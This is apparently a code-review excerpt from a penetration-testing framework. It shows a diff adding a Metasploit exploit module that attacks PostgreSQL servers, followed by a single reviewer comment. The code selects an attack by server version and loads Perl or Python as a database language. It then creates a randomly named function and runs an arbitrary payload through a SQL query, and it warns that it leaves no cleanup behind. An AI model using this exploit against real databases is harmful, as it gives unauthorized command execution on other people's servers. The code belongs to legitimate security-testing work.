modules/exploits/multi/postgres/postgres_createlang.rb

```diff
@@ -0,0 +1,258 @@
+
+    case version
+      when :noauth
+        print_error "#{rhost}:#{rport} - Authentication failed"
+        return
+
+      when :noconn
+        print_error "#{rhost}:#{rport} - Connection failed"
+        return
+
+      else
+        print_status "#{rhost}:#{rport} - #{version}"
+    end
+
+    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+    major_version = version_match['major_version']
+    extension = 'LANGUAGE'
+
+    if major_version.to_i == 8
+      print_status "#{rhost}:#{rport} - Selecting version 8 attack"
+      extension = 'LANGUAGE'
+
+    elsif major_version.to_i >= 9
+      print_status "#{rhost}:#{rport} - Selecting version 9 attack"
+      extension = 'LANGUAGE'
+
+    else
+      print_error "#{rhost}:#{rport} - Unsupported version - #{version}"
+      return false
+    end
+
+    print_warning 'This exploit does not clean up after itself - you will need to do that manually'
+
+    # Attack!
+    begin
+      func_name = Rex::Text.rand_text_alpha(10)
+
+      languages = %w(perl python python2 python3)
+      loaded = false
+
+      languages.each do |language|
+        load_lang = create_language(language, extension)
+        human_language = language.capitalize
+
+        print_status "#{rhost}:#{rport} - Attempting to load #{human_language}"
+
+        case load_lang
+          when :exists
+            print_good "#{rhost}:#{rport} - #{human_language} is already loaded, continuing"
+            create_function(language, func_name)
+            loaded = true
+
+          when :loaded
+            print_good "#{rhost}:#{rport} - #{human_language} was successfully loaded, continuing"
+            create_function(language, func_name)
+            loaded = true
+
+          when :not_exists
+            print_status "#{rhost}:#{rport} - #{human_language} could not be loaded"
+
+          else
+            print_error "#{rhost}:#{rport} - Error occurred"
+            return false
+        end
+
+        break if loaded
+      end
+
+      if loaded
+        # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say
+        # "NoMethodError undefined method `+' for nil:NilClass"
+        # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
+        select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
+
+        case select_query.keys[0]
+          when :conn_error
+            print_error "#{rhost}:#{rport} - Connection error"
+
+          when :sql_error
+            print_error "#{rhost}:#{rport} - Exploit failed"
+            return false
+
+          when :complete
+            print_good "#{rhost}:#{rport} - Exploit successful"
+        end
+
+      else
+        print_error "#{rhost}:#{rport} - Exploit failed"
+        return false
+      end
+
+    rescue RuntimeError => e
```

Comment:
This is dangerous to rescue.  Is this necessary in light of the gsub stuff you are hacking around on line ~156?